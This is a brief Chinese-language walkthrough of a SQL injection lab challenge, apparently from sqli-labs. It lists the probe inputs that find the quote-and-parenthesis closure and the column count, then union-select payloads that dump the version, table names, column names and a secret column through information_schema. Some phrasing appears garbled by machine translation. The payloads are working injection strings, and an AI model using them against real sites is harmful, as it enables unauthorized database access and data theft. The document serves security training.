SQL注射限制频率
每次重新设置时,数据库的表名、字段名和数据都会发生变化
?id=1
?id=1'
发现没有报错信息
?id=1"
返回正常,直接识别双进制开关的关闭方法
?id=1'--+
?id=1')--+
?id=1'))--+
参考数返回正常,所以它是参考数关闭
?id=1' order by 3--+回显正常
?id=1' order by 4--+回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
